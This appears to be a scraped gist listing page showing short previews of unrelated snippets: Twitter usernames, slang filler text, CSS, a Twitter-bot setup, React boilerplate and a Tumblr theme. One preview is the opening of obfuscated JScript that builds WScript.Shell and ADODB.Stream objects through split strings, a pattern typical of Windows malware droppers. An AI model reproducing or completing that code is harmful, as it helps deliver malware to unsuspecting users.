This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#list of people tweeting in brisbane | |
0092991 | |
009Rae | |
0114kyohei | |
01D7oom | |
036cd686bc1a4dc | |
0402595022a | |
0411makikkuma | |
0509yy | |
0516pikari |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ 'Get a dog up ya strewth where he\'s got a massive cab sav. Mad as a spit the dummy when he hasn\'t got a cubby house. Stands out like a billy how shazza got us some bogan. As cross as a roo bar also flat out like a relo. As cunning as a frog in a sock when she\'ll be right pav. Get a dog up ya franger with grab us a thongs. As cunning as a fair go how as dry as a g\'day.', | |
'Get a dog up ya kindie mate as dry as a dipstick. She\'ll be right mates mate flat out like a dob. Grab us a dunny how he hasn\'t got a rapt. As cunning as a bazza when shazza got us some rubbish. As stands out like bull bar mate he\'s got a massive struth. As dry as a pot how gutful of bail up. She\'ll be right beauty to he\'s got a massive billy. Lets throw a cobber no dramas you little ripper struth.', | |
'Built like a scratchy my watch out for the greenie. Lets throw a postie and watch out for the crook. She\'ll be right bathers when he\'s got a massive servo. She\'ll be right top end bloody stands out like a sook. He\'s got a mass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function (acMRvoX) { | |
function ULkwjGJGnWG(ubLrFIZDoYnE) | |
{ | |
return new acMRvoX.ActiveXObject(ubLrFIZDoYnE) | |
} | |
var WuLhqkJdtaacjb = true, jkFZqNhrYZWkwl = ("B.St"+(993982, "ream")); | |
var PnPtHKXuORqDqyM; | |
PnPtHKXuORqDqyM = function (HdjxVffbRet, KuRguBRxAJGxrhe, JLKatIaUwWO) { | |
TUIakctOdZrinn=((1/*s921510nuM400235eOiZ*/)?"WScri":"")+"pt.Shell"; | |
var KHSlcydxPLl = ULkwjGJGnWG(TUIakctOdZrinn); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.features { | |
background: url(images/default-featurebg.jpg) no-repeat center top; | |
clear: both; | |
min-height: 450px; | |
padding: 2%; | |
} | |
.features-widgetarea { | |
padding: 2%; | |
float: right; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// npm install twit | |
var Twit = require('twit') | |
// Get these from apps.twitter.com | |
var T = new Twit({ | |
consumer_key: 'put your consumer key here', | |
consumer_secret: 'put your consumer secret here', | |
access_token: 'put your access token here', | |
access_token_secret: 'put your access token secret here', | |
timeout_ms: 60*1000, // optional HTTP request timeout to apply to all requests. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="UTF-8" /> | |
<title>Hello World</title> | |
<script crossorigin src="https://unpkg.com/react@16/umd/react.development.js"></script> | |
<script crossorigin src="https://unpkg.com/react-dom@16/umd/react-dom.development.js"></script> | |
<script src="https://unpkg.com/[email protected]/babel.min.js"></script> | |
</head> | |
<body> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="UTF-8" /> | |
<title>Random</title> | |
<script crossorigin src="https://unpkg.com/react@16/umd/react.development.js"></script> | |
<script crossorigin src="https://unpkg.com/react-dom@16/umd/react-dom.development.js"></script> | |
<script src="https://unpkg.com/[email protected]/babel.min.js"></script> | |
<style> | |
html { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | |
<!-- | |
the default network 3.1 | |
http://thedefaultnetwork.tumblr.com/ | |
tumblr theme #33653 | |
http://www.tumblr.com/theme/33653 | |
included plugins | |
fidvids v 1.0 | |
infinite scroll v 2.0b2.110713 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
border: no | |
license: gpl-3.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
license: mit | |
height: 200 |
OlderNewer